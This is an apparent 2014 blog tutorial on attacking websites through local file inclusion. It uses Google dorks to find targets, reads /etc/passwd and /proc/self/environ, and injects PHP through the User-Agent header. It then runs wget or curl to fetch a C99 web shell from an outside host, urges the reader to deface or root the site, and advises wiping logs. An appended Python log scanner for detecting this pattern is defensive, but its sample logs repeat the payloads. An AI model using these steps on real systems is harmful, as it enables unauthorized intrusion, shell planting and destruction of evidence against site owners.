Tuesday, 18 March 2014

How to hack a website with Local file inclusion or LFI


To find a vulnerable website, we will be using what is known as a Google 'dork': a specific search string or term that makes Google return the desired results. All you have to do is paste the dork into Google search, and see what you find!
 

allinurl:index.php?page=


Essentially you can replace 'index' and 'page' with whatever words you want and then search for that.

For example, you can use:



allinurl:site.php?site=


Once you paste your dork into Google, you should come up with a list of websites which contain that URL; simply go to one of these and then follow the steps below!

NOTE: Few sites are vulnerable to LFI, but they do exist! You just have to keep searching until you find one.

So, let's say that we find the following site using our dork:

http://www.site.com/index.php?page=contacts.php



What we're going to do is replace contacts.php with 'null', so that you get the following:

http://www.site.com/index.php?page=null



If you see a list of errors running down the page, or missing content (pictures, text etc.), then the site is vulnerable and we may continue, otherwise just move on to the next site.

Now, we're going to try to open a file which we know exists on Linux servers, /etc/passwd.

Since index.php has the rights to open a file like contacts.php, it's possible that the administrator has forgotten to restrict its access to other files, including the files containing sensitive data.

We're going to try to read the file "/etc/passwd", which contains the list of user accounts (root and the other users).

So, now change your URL to:

http://www.site.com/index.php?page=/etc/passwd



If you see a large list of data appear, then that's great, the site is completely vulnerable to LFI, and you've pretty much got this in the bag.

If you don't see this data, but get a 403 error or more errors, then move on to another site.

Now, change your URL again to:

http://www.site.com/index.php?page=/proc/self/environ



If you now see a new set of data, that's great.

If somewhere in the data the following is shown, then that's even better.




DOCUMENT_ROOT=((Random value here))


If not, unfortunately you'll have to move on; there are ways to circumvent this, but I'm keeping this tutorial as basic as I can.

Now, open up Tamper Data, and change your User Agent value to the following:




<?system('id');?>


This is basic PHP code to check if we can execute code on our vulnerable machine.
The page should refresh, and your DOCUMENT_ROOT value should have changed; if it didn't, go for another website.
Now change your User Agent again, this time to:




<?system('uname -a');?>


If your User Agent changes again, great.
Now we're going to upload a shell, which will grant us full control of the site, and the ability to deface / root / whatever the fuck you feel like doing.
Change your user agent to the following:




<?system('wget http://www.sh3ll.org/c99.txt -O secret.php');?>


What the above command does is save a text copy of a powerful PHP shell, 'C99', to a file named secret.php.
Note: If the above wget command does not work, you should try curling it instead:




<?system('curl -o shell.php http://www.sh3ll.org/c99.txt');?>


Now navigate to your shell, which should be at the following URL:

http://www.site.com/secret.php



NOTE: If your website's vulnerable page was something like

http://www.site.com/dir/dir/dir/index.php?page=contacts.php



Then your shell will be in the same directory as index.php, so for the above case, you will find it at:

http://www.site.com/dir/dir/dir/secret.php



Now that your shell is uploaded, go nuts!

Don't forget to wipe the logs before you leave -- IMPORTANT.

Good luck and have fun!
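As an added example (not part of the original post): a small Python scanner that flags, in web-server access logs, the request pattern this walkthrough relies on, i.e. sensitive-file reads through the page parameter, path traversal, and PHP tags or download tools placed in the User-Agent header. The log lines and the download host are constructed, and the watch-list of paths is an assumption.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access log (combined format), not real traffic; download host is a placeholder.
SAMPLE_LOG = """\
203.0.113.5 - - [18/Mar/2014:10:01:02 +0000] "GET /index.php?page=contacts.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [18/Mar/2014:10:01:09 +0000] "GET /index.php?page=/etc/passwd HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
203.0.113.5 - - [18/Mar/2014:10:01:15 +0000] "GET /index.php?page=/proc/self/environ HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
203.0.113.5 - - [18/Mar/2014:10:01:30 +0000] "GET /index.php?page=/proc/self/environ HTTP/1.1" 200 2250 "-" "<?system('id');?>"
203.0.113.5 - - [18/Mar/2014:10:01:44 +0000] "GET /index.php?page=/proc/self/environ HTTP/1.1" 200 2300 "-" "<?system('wget http://example.invalid/c99.txt -O secret.php');?>"
198.51.100.9 - - [18/Mar/2014:10:02:00 +0000] "GET /index.php?page=about.php HTTP/1.1" 200 640 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(  # ip ident user [time] "method target proto" status size "referer" "user-agent"
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$')
SENSITIVE_PATHS = ("/etc/passwd", "/etc/shadow", "/proc/self/environ")  # assumed watch-list
PHP_TAG_RE = re.compile(r"<\?(php|=)?.*\?>", re.S)   # PHP open/close tags inside a header value
FETCH_TOOL_RE = re.compile(r"\b(wget|curl)\b", re.I)  # download tool named inside that code

def classify(line):
    """Return finding tags for one log line; [] means nothing suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed"]  # never let a malformed line pass silently
    findings = []
    # parse_qs URL-decodes, so %2e%2e%2f traversal is compared as the path it denotes.
    for values in parse_qs(urlsplit(m["target"]).query).values():
        for v in values:
            v = unquote(v)  # also catch double-encoded values
            if "../" in v or "..\\" in v:
                findings.append("traversal")
            if any(p in v for p in SENSITIVE_PATHS):
                findings.append("sensitive-file")
    ua = unquote(m["ua"])
    if PHP_TAG_RE.search(ua):
        findings.append("php-in-user-agent")
        if FETCH_TOOL_RE.search(ua):
            findings.append("remote-fetch-in-user-agent")
    return findings

def scan(log_text):
    """Return (client_ip, findings) for every line with at least one finding, in log order."""
    hits = []
    for line in log_text.splitlines():
        findings = classify(line)
        if findings:
            m = LOG_RE.match(line)
            hits.append((m["ip"] if m else None, findings))
    return hits
```

A single client producing the escalating sequence sensitive-file, then php-in-user-agent, then remote-fetch-in-user-agent is the signal to act on; a lone sensitive-file hit is often just a scanner.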
